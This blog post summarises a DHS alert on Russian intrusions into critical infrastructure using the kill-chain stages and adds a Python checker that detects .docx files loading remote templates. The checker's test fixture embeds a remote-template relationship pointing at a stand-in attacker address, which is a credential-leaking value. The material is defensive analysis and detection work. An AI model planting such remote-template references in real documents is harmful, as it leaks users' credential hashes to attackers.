Yesterday the Department of Homeland Security issued an alert (US-CERT TA18-074A) entitled "Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors." The alert describes how Russian government actors have been using cyber intrusions to gain footholds in critical U.S. infrastructure networks.

How bad is the problem?  The alert includes a reconstructed screenshot of the intruders accessing an industrial control system's human-machine interface; the image originally shown here is that reconstruction.

DHS used Lockheed Martin's seven-stage Cyber Kill Chain framework to lay out the details of the Russian campaign.

  1. Reconnaissance. The Russians researched their targets for information to use in spearphishing emails. There were two classes of targets: "staging targets," which were compromised because of their trusted relationship with the "intended targets," and the intended targets themselves, which are operators of critical infrastructure.
  2. Weaponization. The Russians used a two-step approach.  In Weapon A (spearphishing) they crafted phishing emails with malicious payloads for both staging targets and intended targets. Emails to staging targets stole credentials that facilitated Weapon B.  In Weapon B (watering hole) the stolen credentials were used to compromise the trusted website of the staging target, turning that website into a credential-harvesting site for the intended targets that visited it.
  3. Delivery. The weaponized spearphishing emails were delivered to the staging targets and intended targets.
  4. Exploitation. The phishing campaigns redirected staging-target personnel to websites that appeared to be trusted destinations and presented the victims with fake login pages to harvest user names and passwords. The phishing campaigns against intended targets used .docx attachments that harvested credentials: according to the alert, the documents referenced a template on a remote server over SMB, so merely opening the file made Office authenticate to the attacker's server and leak the user's credential hash. The watering holes created in Stage 2 were used for the same credential-harvesting process.
  5. Installation. The stolen credentials were used for system access and to create local administrator accounts for the Russians to use. With that access established, a wide variety of skulduggery became possible.
  6. Command and Control. The Russians created web shells on the intended targets' publicly accessible email and web servers.
  7. Actions on Objectives. The Russians established remote access services and infrastructure such as VPN, RDP and Outlook Web Access. With these services they could engage in additional reconnaissance, including accessing and copying information about industrial control systems (the screenshot above).  The Russians also engaged in anti-forensic activities to cover their tracks.
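The .docx trick in stage 4 works because a Word document is a zip of XML parts, and its relationship (`.rels`) files may point at external targets that Word resolves automatically when the document opens. The checker below is an added example, not code from the DHS alert or the original post: it unpacks a document in memory, lists every external relationship, and flags the ones that are both auto-loaded (attached template, image, OLE object, frame, sub-document) and remote (a UNC path or a URL with a host part), while ignoring local `file:///C:/...` templates and ordinary clickable hyperlinks. The sample documents, the test address 203.0.113.5 and the `build_docx`/`rels_xml` helpers are constructed for the example.

```python
"""Flag .docx relationships that make Word contact a remote host on open.
Added example; not from the DHS alert or the original page."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship kinds Word resolves without a click; a remote target here
# triggers an automatic SMB/HTTP fetch (and, over SMB, an NTLM handshake).
AUTO_LOAD_TYPES = {"attachedTemplate", "image", "oleObject", "frame", "subDocument"}


def is_remote(target: str) -> bool:
    """True if the target names another host: a UNC path or a URL with a host part.
    Local paths such as file:///C:/... have an empty host and are not remote."""
    if target.startswith("\\\\") or target.startswith("//"):
        return True
    parsed = urlparse(target)
    return parsed.scheme.lower() in {"file", "smb", "http", "https"} and bool(parsed.netloc)


def external_relationships(docx_bytes: bytes):
    """Yield (part name, short relationship type, target) for every External relationship."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                yield name, rel_type, rel.get("Target", "")


def scan_docx(docx_bytes: bytes):
    """Return the relationships that would cause an automatic remote fetch on open."""
    return [rel for rel in external_relationships(docx_bytes)
            if rel[1] in AUTO_LOAD_TYPES and is_remote(rel[2])]


# --- constructed sample documents (hypothetical helpers, not real-world files) ---

def rels_xml(entries) -> str:
    """Build a .rels part from (Id, short type, target, TargetMode) tuples."""
    body = "".join(
        f'<Relationship Id="{rid}" Type="{OOXML_REL}{kind}" Target="{target}" TargetMode="{mode}"/>'
        for rid, kind, target, mode in entries)
    return (f'<?xml version="1.0" encoding="UTF-8"?>'
            f'<Relationships xmlns="{RELS_NS[1:-1]}">{body}</Relationships>')


def build_docx(parts: dict) -> bytes:
    """Assemble a minimal .docx (a zip of XML parts) in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


# Attached template on an attacker host (RFC 5737 test address): flagged.
PHISHING_DOCX = build_docx({
    "word/_rels/settings.xml.rels": rels_xml([
        ("rId1", "attachedTemplate", "file://203.0.113.5/share/template.dotm", "External")]),
    "word/_rels/document.xml.rels": rels_xml([
        ("rId2", "hyperlink", "https://www.example.com/", "External")]),
})

# Local template plus a clickable hyperlink: nothing is fetched on open, not flagged.
BENIGN_DOCX = build_docx({
    "word/_rels/settings.xml.rels": rels_xml([
        ("rId1", "attachedTemplate", "file:///C:/Users/alice/Templates/report.dotm", "External")]),
    "word/_rels/document.xml.rels": rels_xml([
        ("rId2", "hyperlink", "https://www.example.com/", "External")]),
})

if __name__ == "__main__":
    for label, doc in (("phishing", PHISHING_DOCX), ("benign", BENIGN_DOCX)):
        print(label, scan_docx(doc))
```

Run it against a mail-gateway quarantine or a sandbox's dropped files to get a cheap first-pass triage; a hit is a reason to look at the document, not proof on its own, since legitimate corporate templates are sometimes served from internal UNC paths, so pair the check with an allow-list of your own file servers.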

This kill chain analysis shows the importance of defending against spearphishing. Both weapons ended in stolen passwords, which is why the alert's mitigations also stress multi-factor authentication and blocking outbound SMB at the network perimeter: a harvested credential is far less useful when it cannot log in by itself, and a document that reaches for a remote template cannot leak a hash if the SMB connection never leaves the network.